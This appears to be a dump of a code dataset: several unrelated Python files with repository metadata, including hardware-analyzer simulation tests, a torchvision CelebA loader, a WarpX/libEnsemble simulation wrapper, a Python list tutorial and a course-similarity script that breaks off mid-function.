yield from self.assertEmitted(tb, [
REPORT_DELAY|4,
REPORT_EVENT|0, 0xaa,
REPORT_DELAY|2,
REPORT_EVENT|0, 0xbb,
], [
(4, {"0": 0xaa}),
(6, {"0": 0xbb}),
])
@simulation_test(sources=(1,))
def test_delay_2_septet(self, tb):
yield tb.dut._delay_timer.eq(0b1_1110000)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1110001,
REPORT_EVENT|0, 0b1
], [
(0b1_1110001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_3_septet(self, tb):
yield tb.dut._delay_timer.eq(0b01_0011000_1100011)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b0011000,
REPORT_DELAY|0b1100100,
REPORT_EVENT|0, 0b1
], [
(0b01_0011000_1100100, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_max(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000011,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_EVENT|0, 0b1
], [
(0xffff, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_EVENT|0, 0b1
], [
(0x10000, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow_p1(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000001,
REPORT_EVENT|0, 0b1
], [
(0x10001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_4_septet(self, tb):
for _ in range(64):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1000001,
REPORT_EVENT|0, 0b1
], [
(0xffff * 64 + 1, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_done(self, tb):
yield from tb.trigger(0, 1)
yield from tb.step()
yield
yield tb.dut.done.eq(1)
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_DELAY|2,
REPORT_SPECIAL|SPECIAL_DONE
], [
(2, {"0": 0b1}),
(4, {})
], flush_pending=False)
@simulation_test(sources=(1,))
def test_throttle_hyst(self, tb):
for x in range(17):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 1)
yield tb.fifo.re.eq(1)
for x in range(51):
yield
yield tb.fifo.re.eq(0)
yield
self.assertEqual((yield tb.dut.throttle), 0)
@simulation_test(sources=(1,))
def test_overrun(self, tb):
for x in range(20):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 1)
yield tb.fifo.re.eq(1)
for x in range(61):
while not (yield tb.fifo.readable):
yield
yield
yield tb.fifo.re.eq(0)
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_SPECIAL|SPECIAL_OVERRUN,
], [
(0x10000, "overrun"),
], flush_pending=False)
| [
"[email protected]"
] | |
bfd4888edb395deaddfdc4022c9b829b04107625 | 024046de7eb1ffd46c77456418b1073e84af15b1 | /torchvision/prototype/datasets/_builtin/celeba.py | ebfce4b652d5b78be5975d14d7c04ac8e4548bb6 | [
"BSD-3-Clause"
] | permissive | jiafatom/vision | ce31eba6fdffce77e9370e0816ffeb0d743bad80 | 7839bdbe1389e734b00529edd9a7566bb8701588 | refs/heads/main | 2023-08-27T22:56:28.723162 | 2021-10-25T19:10:20 | 2021-10-25T19:10:20 | 319,733,821 | 0 | 0 | BSD-3-Clause | 2020-12-08T19:01:41 | 2020-12-08T19:01:40 | null | UTF-8 | Python | false | false | 6,753 | py | import csv
import io
from typing import Any, Callable, Dict, List, Optional, Tuple, Iterator, Sequence
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
Shuffler,
Filter,
ZipArchiveReader,
Zipper,
KeyZipper,
)
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
GDriveResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import INFINITE_BUFFER_SIZE, getitem, path_accessor
csv.register_dialect("celeba", delimiter=" ", skipinitialspace=True)
class CelebACSVParser(IterDataPipe[Tuple[str, Dict[str, str]]]):
def __init__(
self,
datapipe: IterDataPipe[Tuple[Any, io.IOBase]],
*,
fieldnames: Optional[Sequence[str]] = None,
) -> None:
self.datapipe = datapipe
self.fieldnames = fieldnames
def __iter__(self) -> Iterator[Tuple[str, Dict[str, str]]]:
for _, file in self.datapipe:
file = (line.decode() for line in file)
if self.fieldnames:
fieldnames = self.fieldnames
else:
# The first row is skipped, because it only contains the number of samples
next(file)
# Empty field names are filtered out, because some files have an extra white space after the header
# line, which is recognized as extra column
fieldnames = [name for name in next(csv.reader([next(file)], dialect="celeba")) if name]
# Some files do not include a label for the image ID column
if fieldnames[0] != "image_id":
fieldnames.insert(0, "image_id")
for line in csv.DictReader(file, fieldnames=fieldnames, dialect="celeba"):
yield line.pop("image_id"), line
class CelebA(Dataset):
@property
def info(self) -> DatasetInfo:
return DatasetInfo(
"celeba",
type=DatasetType.IMAGE,
homepage="https://mmlab.ie.cuhk.edu.hk/projects/CelebA.html",
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
splits = GDriveResource(
"0B7EVK8r0v71pY0NSMzRuSXJEVkk",
sha256="fc955bcb3ef8fbdf7d5640d9a8693a8431b5f2ee291a5c1449a1549e7e073fe7",
file_name="list_eval_partition.txt",
)
images = GDriveResource(
"0B7EVK8r0v71pZjFTYXZWM3FlRnM",
sha256="46fb89443c578308acf364d7d379fe1b9efb793042c0af734b6112e4fd3a8c74",
file_name="img_align_celeba.zip",
)
identities = GDriveResource(
"1_ee_0u7vcNLOfNLegJRHmolfH5ICW-XS",
sha256="c6143857c3e2630ac2da9f782e9c1232e5e59be993a9d44e8a7916c78a6158c0",
file_name="identity_CelebA.txt",
)
attributes = GDriveResource(
"0B7EVK8r0v71pblRyaVFSWGxPY0U",
sha256="f0e5da289d5ccf75ffe8811132694922b60f2af59256ed362afa03fefba324d0",
file_name="list_attr_celeba.txt",
)
bboxes = GDriveResource(
"0B7EVK8r0v71pbThiMVRxWXZ4dU0",
sha256="7487a82e57c4bb956c5445ae2df4a91ffa717e903c5fa22874ede0820c8ec41b",
file_name="list_bbox_celeba.txt",
)
landmarks = GDriveResource(
"0B7EVK8r0v71pd0FJY3Blby1HUTQ",
sha256="6c02a87569907f6db2ba99019085697596730e8129f67a3d61659f198c48d43b",
file_name="list_landmarks_align_celeba.txt",
)
return [splits, images, identities, attributes, bboxes, landmarks]
_SPLIT_ID_TO_NAME = {
"0": "train",
"1": "valid",
"2": "test",
}
def _filter_split(self, data: Tuple[str, Dict[str, str]], *, split: str) -> bool:
return self._SPLIT_ID_TO_NAME[data[1]["split_id"]] == split
def _collate_anns(self, data: Tuple[Tuple[str, Dict[str, str]], ...]) -> Tuple[str, Dict[str, Dict[str, str]]]:
(image_id, identity), (_, attributes), (_, bbox), (_, landmarks) = data
return image_id, dict(identity=identity, attributes=attributes, bbox=bbox, landmarks=landmarks)
def _collate_and_decode_sample(
self,
data: Tuple[Tuple[str, Tuple[str, List[str]], Tuple[str, io.IOBase]], Tuple[str, Dict[str, Any]]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
split_and_image_data, ann_data = data
_, _, image_data = split_and_image_data
path, buffer = image_data
_, ann = ann_data
image = decoder(buffer) if decoder else buffer
identity = int(ann["identity"]["identity"])
attributes = {attr: value == "1" for attr, value in ann["attributes"].items()}
bbox = torch.tensor([int(ann["bbox"][key]) for key in ("x_1", "y_1", "width", "height")])
landmarks = {
landmark: torch.tensor((int(ann["landmarks"][f"{landmark}_x"]), int(ann["landmarks"][f"{landmark}_y"])))
for landmark in {key[:-2] for key in ann["landmarks"].keys()}
}
return dict(
path=path,
image=image,
identity=identity,
attributes=attributes,
bbox=bbox,
landmarks=landmarks,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
splits_dp, images_dp, identities_dp, attributes_dp, bboxes_dp, landmarks_dp = resource_dps
splits_dp = CelebACSVParser(splits_dp, fieldnames=("image_id", "split_id"))
splits_dp = Filter(splits_dp, self._filter_split, fn_kwargs=dict(split=config.split))
splits_dp = Shuffler(splits_dp, buffer_size=INFINITE_BUFFER_SIZE)
images_dp = ZipArchiveReader(images_dp)
anns_dp = Zipper(
*[
CelebACSVParser(dp, fieldnames=fieldnames)
for dp, fieldnames in (
(identities_dp, ("image_id", "identity")),
(attributes_dp, None),
(bboxes_dp, None),
(landmarks_dp, None),
)
]
)
anns_dp = Mapper(anns_dp, self._collate_anns)
dp = KeyZipper(
splits_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=path_accessor("name"),
buffer_size=INFINITE_BUFFER_SIZE,
keep_key=True,
)
dp = KeyZipper(dp, anns_dp, key_fn=getitem(0), buffer_size=INFINITE_BUFFER_SIZE)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
| [
"[email protected]"
] | |
97cc36dd32b2d5cd5c4ab97c7b39c7420193152f | 8b9c84f2540ef9de8830232898b7b3636523ceff | /Problem1.py | 4d8d558f4df6dcc8a1440776e4ca8d187309fb29 | [] | no_license | s-andromeda/Binary-Search-3 | e06b73352af51666bd7d8bf0f4f33a6ec54b9dba | eafd90e65bd04ca544c80d5f24a9ceef55786ad2 | refs/heads/master | 2022-11-17T07:18:50.414405 | 2020-07-21T07:06:29 | 2020-07-21T07:06:29 | 280,072,057 | 0 | 0 | null | 2020-07-16T06:24:20 | 2020-07-16T06:24:19 | null | UTF-8 | Python | false | false | 704 | py | """
Student : Shahreen Shahjahan Psyche
Time : O(log N) [binary search]
Space : O(1) [No Auxiliary Space Has Been Used]
Pased Test Cases : Yes
"""
class Solution:
def myPow(self, x: float, n: int) -> float:
# base case
if n == 0:
return 1
# calling recursive function after halfing n
temp = self.myPow(x, int(n/2))
# if n is even
if n%2 == 0:
return temp * temp
else:
# if n is positive
if n > 0:
return temp * temp * x
else:
return temp * temp * (1/x)
| [
"[email protected]"
] | |
f9f6066f5029d0b9a9d17b03d3525476857e4fb2 | 2d5d17225ddabe81f17b74589895f49e530344f8 | /testchild.py | bd5664d3017ce696e7674d7c93dc078eddbccbca | [] | no_license | Gracia958/testrepo | 230644e4976414c67e12a508d14f832e3d73d7d9 | db898e9748ab851b65421ae7819019cd5211b64b | refs/heads/master | 2022-11-27T13:10:05.071494 | 2020-07-28T07:19:54 | 2020-07-28T07:19:54 | 282,127,528 | 0 | 0 | null | 2020-07-28T07:19:55 | 2020-07-24T05:03:38 | Python | UTF-8 | Python | false | false | 64 | py | ##Add a new file in child branch.
print ("Inside Child branch")
| [
"[email protected]"
] | |
b9d01644c808a33c9c69100e16e1b4652eec57a9 | 1616b2a7082196182a853ac85a336974f80dc680 | /Tools/LibEnsemble/warpx_simf.py | 8822d22efe1fcf163ab6f931080add47b6f9903e | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"BSD-3-Clause-LBNL"
] | permissive | RevathiJambunathan/WarpX | a034416ae9369e48bc1f7c2ed95fa6800eb5f522 | 85bc4610adbdd5a48f1cbe666f11db6b72a781c0 | refs/heads/development | 2023-09-01T12:49:36.522416 | 2021-01-27T18:02:18 | 2021-01-27T18:02:18 | 174,003,690 | 0 | 4 | NOASSERTION | 2023-09-13T00:30:57 | 2019-03-05T18:59:20 | C++ | UTF-8 | Python | false | false | 4,170 | py | import os
import time
import numpy as np
from libensemble.executors.executor import Executor
from libensemble.message_numbers import WORKER_DONE, TASK_FAILED
from read_sim_output import read_sim_output
from write_sim_input import write_sim_input
"""
This file is part of the suite of scripts to use LibEnsemble on top of WarpX
simulations. It defines a sim_f function that takes LibEnsemble history and
input parameters, run a WarpX simulation and returns 'f'.
"""
def run_warpx(H, persis_info, sim_specs, libE_info):
"""
This function runs a WarpX simulation and returns quantity 'f' as well as
other physical quantities measured in the run for convenience. Status check
is done periodically on the simulation, provided by LibEnsemble.
"""
# Setting up variables needed for input and output
# keys = variable names
# x = variable values
# libE_output = what will be returned to libE
calc_status = 0 # Returns to worker
input_file = sim_specs['user']['input_filename']
time_limit = sim_specs['user']['sim_kill_minutes'] * 60.0
machine_specs = sim_specs['user']['machine_specs']
exctr = Executor.executor # Get Executor
# Modify WarpX input file with input parameters calculated by gen_f
# and passed to this sim_f.
write_sim_input(input_file, H['x'])
# Passed to command line in addition to the executable.
# Here, only input file
app_args = input_file
os.environ["OMP_NUM_THREADS"] = machine_specs['OMP_NUM_THREADS']
# Launch the executor to actually run the WarpX simulation
if machine_specs['name'] == 'summit':
task = exctr.submit(calc_type='sim',
extra_args=machine_specs['extra_args'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
else:
task = exctr.submit(calc_type='sim',
num_procs=machine_specs['cores'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
# Periodically check the status of the simulation
poll_interval = 1 # secs
while(not task.finished):
time.sleep(poll_interval)
task.poll()
if task.runtime > time_limit:
task.kill() # Timeout
# Set calc_status with optional prints.
if task.finished:
if task.state == 'FINISHED':
calc_status = WORKER_DONE
elif task.state == 'FAILED':
print("Warning: Task {} failed: Error code {}"
.format(task.name, task.errcode))
calc_status = TASK_FAILED
elif task.state == 'USER_KILLED':
print("Warning: Task {} has been killed"
.format(task.name))
else:
print("Warning: Task {} in unknown state {}. Error code {}"
.format(task.name, task.state, task.errcode))
# Safety
time.sleep(0.2)
# Get output from a run and delete output files
warpx_out = read_sim_output(task.workdir)
# Excluding results - NaN - from runs where beam was lost
if (warpx_out[0] != warpx_out[0]):
print(task.workdir, ' output led to NaN values (beam was lost or run did not finish)')
# Pass the sim output values to LibEnsemble.
# When optimization is ON, 'f' is then passed to the generating function
# gen_f to generate new inputs for next runs.
# All other parameters are here just for convenience.
libE_output = np.zeros(1, dtype=sim_specs['out'])
libE_output['f'] = warpx_out[0]
libE_output['energy_std'] = warpx_out[1]
libE_output['energy_avg'] = warpx_out[2]
libE_output['charge'] = warpx_out[3]
libE_output['emittance'] = warpx_out[4]
libE_output['ramp_down_1'] = H['x'][0][0]
libE_output['ramp_down_2'] = H['x'][0][1]
libE_output['zlens_1'] = H['x'][0][2]
libE_output['adjust_factor'] = H['x'][0][3]
return libE_output, persis_info, calc_status
| [
"[email protected]"
] | |
84b2147114b80a5def71d56900706a173d972b84 | 8322fc54e79c8311f8503c22236d146f3a9e4c00 | /day03/02_python列表-list.py | ac8ae40a71a92a073eb038858d48346519c45db9 | [] | no_license | syasky/python | c8adae0014d1c3d221771f2ef06948d38aed2b7f | e88396503b2c9acaade8753ba6bcc9abbac3d145 | refs/heads/master | 2022-11-10T18:16:52.119695 | 2020-06-25T11:41:36 | 2020-06-25T11:41:36 | 274,897,249 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,413 | py | #创建列表
list1=[1,2,3,'口罩','cov']
print(list1)
print(type(list1))
list2=[1,2,3,4]
print(list2)
list3=['a','b','c','d']
print(list3)
str1='hello'
list4=[str1,True,1,None,list3]
print(list4)
print('--------------------------------------------------------------')
'''
一个变量存三组数据
1组:一万,二万,三万
2组:四条,五条,六条
3组:七筒,八筒,九筒
'''
mahjong = [
['一万','二万','三万'],
['四条','五条','六条'],
['七筒','八筒','九筒']
]
#mahjong 是一个二维列表
print(mahjong)
#三维数组
threeD=[mahjong,mahjong]
print(threeD)
print('===============操作===============')
#----------1.创建----------
#快速创建 单一 值 的 纯字符串组成的list,可以用 list(str)
list5=['a','b','c']
print(list5)
list6=list('abcdefg123')
print(list6)
#list()内直接放数字可以吗?
# list(123) 不可以,因为数字是不可迭代的,不能 list() 转换位列表
#创建不是单一数据的列表
#字符串 转换
# str.split('x') 以x将str 进行分割成 list
list7='熊大/熊二/熊三'.split('/')
print(list7)
#----------2.读取列表----------
#使用 索引 或者 下标 从0开始代表第一个
list8=[2,3,4,'a','b','c']
#读取2
print(list8[0])
#读取'a'
print(list8[3])
#读取'c'. 读取可以反正读,最后一个是-1
print(list8[-1])
#假设 不知道 list8 多少个数,读取第10个数
#print(list8[9]) 会报错
#我们有个方法可以读取list 值的个数,或者说长度 len() length
print(len(list8))
#--我们不仅可以读一个数据, 还可以读一堆数据
'''
语法: list[start:end:step]
start :开始的位置,不写的话,默认开头为0
end :接受的位置(不包含结束位),不屑的话,默认 结尾+1
step : 读取的步长,默认是1,可以为负数倒着读
'''
list9=[1,2,3,4,5,6,7,8,9,10]
#list9=range(1,11)
#读取 list9 偶数位数据
print(list9[1:10:2])
print(list9[1:100:2])
print(list9[1::2])
#如果list的长度过长,恶魔也想往后取,但是数起来太麻烦,用len()
print(list9[1:len(list9):2])
#rang list9 倒叙输出
print(list9[-1::-1])
# print(list9[10::-1])
print(list9[::-1])
print(list9[len(list9)::-1])
#读取8 6 4 2
print(list9[-3::-2])
print(list9[len(list9)-3::-2])
#正取2468,倒过来
print(list9[1:-2:2][::-1])
#读取数据,偶尔遇到一种情况,以xxx位置为基础,再操作
#如果读取某个数据往后的几个数据
#5往后的三个数据
print(list9.index(5))
print(list9[list9.index(5):list9.index(5)+3])
#字符串的 某个字符开始
str2='abcdefghij'
print(str2.find('d'))
#----------3.更新列表----------
print('----------3.更新列表----------')
list10=[10,20,30]
#增加数据到xxx的结尾
#语法: xxx.append(yy)将yy增加到xxx列表的结尾
#增加40到结尾
list10.append(40)
print(list10)
#还可以增加任意数据类型
list10.append(['a','b','c'])
print(list10)
#xxx.insert(index,yy) 将yy放到xxx的index 索引位
list10.insert(0,1)
print(list10)
list10.insert(len(list10),'d')
print(list10)
#更改数据,xxx[index]='新值'
#如将1改为1024 当成将list10的某个索引位的值换个 内存地址 的指向
list10[0]=1024
print(list10)
#同一个值,内存地址一样
a=10
print(id(a))
b=10
print(id(b))
print(id(list10[1]))
ss=['a','b','c']
print(id(ss))
print(id(list10[5]))
ss1=['f','g']
list10.append(ss1)
print(list10)
print(id(ss1))
print(id(list10[-1]))
ss1[0]='ffffffffffff'
print(list10)
#----------4.删除数据----------
#语法 del xxx[索引] .delete 单词
del list10[0]
print(list10)
# 也可以删除整个list10,释放内存
del list10
#删除后 操作list10 ,会报错
# print(list10)
#----------5.列表的操作符----------
# + 连接列表
aa=[1,2,3]
bb=['4',5,6]
cc=aa+bb
print(cc)
# * 扩展 list的倍数个
shasha=aa*2
print(shasha)
# in 想象成去 教室找人,xx in 更多结果 if 使用
classroom=['张三','李四','王五']
flag=('李四' in classroom)
print(flag)
print('李四' in classroom)
flag2=('沙沙' in classroom)
print(flag2)
#if
if '张三' in classroom:
print('请你吃饭')
| [
"[email protected]"
] | |
63459c05f9decea9fb591739d9950284975a7236 | 11594333854f35e942fde4db523a543aa74c6000 | /Similarities.py | ab699aedb9ecf4b6f72de97b2486aad55e137f37 | [] | no_license | Epsilon456/WordSimilarities | 2f43ce209470cb17810dee9860abb4b6a835a399 | 5f25cbbb1383dd3fc16a4fa38ea011412df3776e | refs/heads/master | 2023-05-31T22:23:36.937710 | 2019-11-18T21:58:20 | 2019-11-18T21:58:20 | 221,731,186 | 1 | 0 | null | 2023-05-22T22:33:00 | 2019-11-14T15:38:53 | Python | UTF-8 | Python | false | false | 17,423 | py | import Levenshtein as LV
import gensim
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
"""This script contains a single class which in turn, contains all 5 of the methods to be tested (as well as their
initialization functions.) The five methods are as follows:
1) Jacard Similarity between course descriptions
2) Leveshtein Distance between course names
3) Similarity of the average Word2Vec encoding of course descriptions
4) Similarity of the Doc2Vec encodings of course descriptions.
5) Similarity of the "matrix" encoding using the pretrained GloVe encodings.
(The matrix encoding is a concatenation of 4 encoding vectors.
1) The average of all word vector encodings in the description.)
2) The average + 1 st dev of all vector encodings
3) A vector consisting of the max values of all vector encodings
4) A vector consisting of the min values of all vector encodings.
The methods used to to call these are as follows:
Jacard
Lev
WordSim
DocSim
GloveSim
"""
class Similarities:
"""This class takes in a training data frame that is used to train the word2vec and doc2vec embeddings.
The 5 methods can the be called when passed the test data frame.
Initialize this class with:
trainDF - The dataframe used to train the embeddings. This will also be the dataframe from which
the program will pull the course closest to the test course.
Mode - Either "All" for initializing all 5 methods or "Word" for only initializing "WordSim"
"""
def __init__(self,trainDF,mode="All"):
self.GloveFail = False
self.mode = mode
#The input training data frame.
self.trainDF = trainDF
#Transforms the text strings from the descriptions into a list of list of words.
self._initText()
#Initializes and trains the word2vec embeddings.
self._initWordVec()
#Only initialize DocSim and GloveSim if required.
if mode == "All":
#Initializes and trains the doc2vec embeddigns.
self._initDocVec()
#Loads in the pretrained GloVe data.
self._initGloveVec()
#Build a dictionary containing the embeddings for each description. This make it so that the
#the embedding functions only need to be called once for the test course which will then
#be compared to the embeddings in this dictionary.
self.VDF = {"Word":{},"Doc":{},"Glove":{}}
self._BuildSims()
def _initText(self):
#Get text from descriptions. The variable is a nested list where the outer list represents
#each description and the inner list is each word in that description.
self.texts = []
for index, row in self.trainDF.iterrows():
self.texts.append(row['description'].split())
print("Text initialized")
def _initWordVec(self):
#Load the list of list consisting of the course descriptions into the word2vec model. Train the model
self.WordVecModel = gensim.models.Word2Vec(self.texts,size=300,window=5,min_count=2,workers=4,iter=100)
print("Word2Vec Model initialized")
def _initDocVec(self):
#Initializes and trains the doc2vec embedding
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
documents = []
#Iterate through each course description and store each as a tagged docuent. Create list of
#tagged documents.
for i in range(len(self.texts)):
documents.append(TaggedDocument(self.texts[i],[i]))
#Train the doc2vec model with the tagged documents.
self.DocVecModel = Doc2Vec(documents, vector_size=300, window=5, min_count=2, workers=4,epochs=100)
print("Doc2Vec Model initialized")
def _initGloveVec(self):
#Initializes the pre-trained GloVe model.
import Setup
import pickle
import os
#If the model has already been saved, import it from the pickle file and store to the variabe "word_vectors"
if os.path.exists(Setup.gloveJar):
with open(Setup.gloveJar,'rb') as f:
glove = pickle.load(f)
self.gloveModel = glove
#If the model has not already been saved, call the api downloader to download the model.
else:
print("Downloading GloVe word embeddings with gensim...")
"Maybe add an option to switch off pickle mode?"
try:
import gensim.downloader as api
glove = api.load("glove-wiki-gigaword-100")
#Once the model has been downloaded, save the word_vectors as a pickle file for later use.
with open(Setup.gloveJar,'wb') as f:
pickle.dump(glove,f)
print("word vectors saved to .pkl file")
self.gloveModel = glove
print("Glove model initialized")
except:
print("Glove Sim model failed to download")
self.GloveFail = True
#Allow word vectors to be accessed by other methods in the class.
def Jacard(self,testDf,listCourse,inCourse):
"""Calculates the Jacard similarity between two course descriptions.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The Jacard similarity score scaled between 0 and 1.
"""
#Obtain the course descriptions for the two course indexes inputed into the function.
A = self.trainDF['description'][listCourse]
B = testDf['description'][inCourse]
#Create a set of words for each description.
setA = set(A.split())
setB = set(B.split())
#Count the number of words in set a that are also in set b.
score = 0
for a in setA:
if a in setB:
score +=1
#Divide the number by the total length of both sets.
return score/(len(setA.union(setB)))
def Lev(self,testDf,listCourse,inCourse):
"""Calculates the Levenshtein distance between two course names.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The compliment of the normalized Levenshtein distance
(The compliment is calculated by 1-(L/D) where L is the Levenshtein distance and D is the length of the
longer of the two strings)
This number is scaled between 0 and 1 where 1 represents a perfect match.
"""
#Obtain the couse names for the two courses provided
A = self.trainDF['name'][listCourse]
B = testDf['name'][inCourse]
#Figure out the length of the longest course name.
maxLen = max(len(A),len(B))
#Calculate the compliment of the normalized Levenshtein distance.
return 1-LV.distance(A,B)/maxLen
def _WordSimAveVec(self,df,a):
"""Calculates the a document embedding vector by taking the average of all word vectors in the document. This is
a helper function to be used with the "WordSim" method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Output:
A vector embedding representing the entire document.
"""
#Obtain the course description for the course provided and convert the string into a list of individual words.
Description = df['description'][a].split()
#Create a placeholder zero vector of the same size as the vector embedding.
Vector = np.zeros(self.WordVecModel.layer1_size)
wordCount = 0
#Iterate over each word in the description.
for word in Description:
#If the word is in the trained vocabulary, obtain the word vector.
#Continue to add the word vectors to the placeholder vector to get the running sum.
if word in self.WordVecModel.wv.vocab:
vector = self.WordVecModel.wv.get_vector(word)
Vector +=vector
#Keep track of how many word vectors (which were included in the vocabulary) were added.
wordCount +=1
#Calculate the mean by dividing the sum by the number of vectors.
return Vector/wordCount
def _BuildSims(self):
"""Builds up the dictionary "self.VDF" to contain all of the document vector embeddings which are in
the training dataset to act as a reference. This way, the references only need to be calculated once.
The method will build up the dictionary using 3 "columns" - one for each word embedding if "All" mode
was selected for initializing the class. If "Word" mode was selected, it will only build the dictionary
for the "WordSim" method.
Dictionary will be in the form VDF[Method][courseName]
"""
if self.mode == "All":
#Iterate through all rows of the training dataframe.
for index, _ in self.trainDF.iterrows():
#Obtain the document embeddings for each method.
wordVec = self._WordSimAveVec(self.trainDF,index)
docVec = self._DocSim(self.trainDF,index)
#Save the embeddings to a dictionary
self.VDF["Word"][index] = wordVec
self.VDF["Doc"][index] = docVec
if self.GloveFail == False:
gloveVec = self._GloveSim(self.trainDF,index)
self.VDF["Glove"][index] = gloveVec
if self.mode == "Word":
for index, _ in self.trainDF.iterrows():
wordVec = self._WordSimAveVec(self.trainDF,index)
self.VDF["Word"][index] = wordVec
def WordSim(self,testDF,listCourse,inCourse):
"""Calculate the cosine similarity between two vectors where each vector represents a course
description. Each vector is made by taking the average of each word vector that makes up the description. Average
vectors are calculated by a helper method "_WordSimAveVec"
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Obtain a single vector embedding for each course description (calculated by taking an average of each word
#embedding that makes up each description)
#Get the embedding from the dictionary for the list (reference) course
aVec = self.VDF["Word"][listCourse]
#Calculate the embedding with the doc2Vec model.
bVec = self._WordSimAveVec(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(aVec,0)
B = np.expand_dims(bVec,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _DocSim(self,df,a):
"""Calculate the cosine similarity between two document vectors.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number"""
#Obtain the descriptions of the two input courses.
textA = df['description'][a]
#Obtain the document embedding vector for each description.
vectorA = self.DocVecModel.infer_vector([textA], alpha=0.1, min_alpha=0.0001, steps=300)
return vectorA
def DocSim(self,testDF,listCourse,inCourse):
"""Calculates a vector embedding for a course description using the doc2vec method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
listCourse - A string containing the course number of the reference course in the trainSet
inCourse - A string containing the course number of the input test course.
"""
#Reference the VDF dictionary to get the doc embedding for the listCourse
vectorA = self.VDF["Doc"][listCourse]
#Calculate the doc embedding for the input course
vectorB = self._DocSim(testDF,inCourse)
#Convert vectors to column vectors to be fed into the cosine_similarity function.
A = np.expand_dims(vectorA,0)
B = np.expand_dims(vectorB,0)
#Calculate the cosine similarity between the two vectors.
sim = cosine_similarity(A,B)
return float(sim)
def _GloveSim(self,testDf,a):
"""Uses the word vectors from the pre-trained GloVe model to generate an array representing the document.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Outputs:
An array consistingof the mean, standard deviation, min and maximum of all word vector embeddings which
make up the course description."""
#Obtain the course description for the given course number.
doc = testDf['description'][a]
#Iterate over each word in the document. For each word in the GloVe vocab, append the word vector to a list
Vectors = []
for word in doc:
if word in self.gloveModel.vocab:
vector = self.gloveModel.get_vector(word)
Vectors.append(vector)
#Turn the list of vectors into an array.
Vectors = np.array(Vectors)
#Calculate the mean, mean+1stdev, maximum, and minimum of this array (each operation reducing
#the array to eliminate rows). Concatenate these 4 measures into one matrix to serve as an index for a
#document.
sd = np.std(Vectors,axis=0)
a0 = np.average(Vectors,axis=0)
